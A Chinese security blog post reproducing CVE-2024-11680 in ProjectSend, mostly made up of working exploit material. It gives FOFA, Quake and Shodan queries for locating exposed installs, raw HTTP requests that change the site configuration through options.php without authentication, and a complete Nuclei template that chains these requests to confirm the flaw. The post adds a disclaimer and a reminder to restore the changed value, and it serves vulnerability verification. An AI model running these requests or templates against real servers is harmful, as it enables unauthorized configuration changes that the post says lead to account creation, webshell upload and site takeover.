【漏洞复现】CVE-2024-11680
【漏洞复现】CVE-2024-11680
混子Hacker 混子Hacker 2024-12-02 12:36
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。
[
漏洞简介
]
——
人生漫长,晴雨交加,但若是心怀热爱,即使岁月荒芜,亦能奔山赴海,静待一树花开
【
摘自《人民日报》
】 ——
CVE-2024-11680
PrојесtSеnd版本在r1720之前受到不当认证漏洞的影响,远程未经认证的攻击者可以通过发送精心制作的HTTP请求到орtiоnѕ.рhр来利用这个缺陷,从而未经授权地修改应用程序的配置,成功利用允许攻击者创建账户、上传ԝеbѕhеllѕ,并嵌入恶意JаvаSсript
漏洞信息
混子Hacker
01
资产测绘
fofa: body="ProjectSend"
Quake:body:"ProjectSend"
混子Hacker**
02
漏洞复现
1、访问网站获取csrftoken和cookie,并记录下title值
GET / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Connection: close
Accept-Encoding: gzip
2、带上cookie和token值访问options.php改title的值,返回500可能存在漏洞
POST /options.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip
csrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428§ion=general&this_install_title=2pei9Dunmem7Jdkj6PbVXS13glW
3、访问首页查看是否修改成功,可以看到title中Log in »后值已经被修改为我们设置的值了
GET / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Connection: close
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip
4、修改之后记得访问options.php给还原回去,不要影响网站的正常运行,访问首页可以看到已经修改回原来的值了
POST /options.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip
csrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428§ion=general&this_install_title=2peHaMAlgDO7f4j4cx0MtyyqdxO
混子Hacker**
03
Nuclei Poc
id: projectsend-auth-bypass
info:
name: ProjectSend <= r1605 - Improper Authorization
author: DhiyaneshDK
severity: high
description: |
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
reference:
- https://www.projectsend.org/
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
metadata:
verified: true
max-request: 1
fofa-query: body="ProjectSend"
shodan-query: html:"ProjectSend"
tags: misconfig,projectsend,auth-bypass,intrusive
variables:
string: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "projectsend")'
condition: and
internal: true
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrf_token" value="([0-9a-z]+)"'
internal: true
- type: regex
name: title
group: 1
regex:
- '<title>Log in » ([0-9a-zA-Z]+)<\/title>'
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{string}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{string}}")'
condition: and
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{title}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{title}}")'
condition: and
# poc运行失败的话下载新版的nuclei试下
<<<
END
原创文章|转载请附上原文出处链接
更多漏洞|关注作者查看
作者|混子Hacker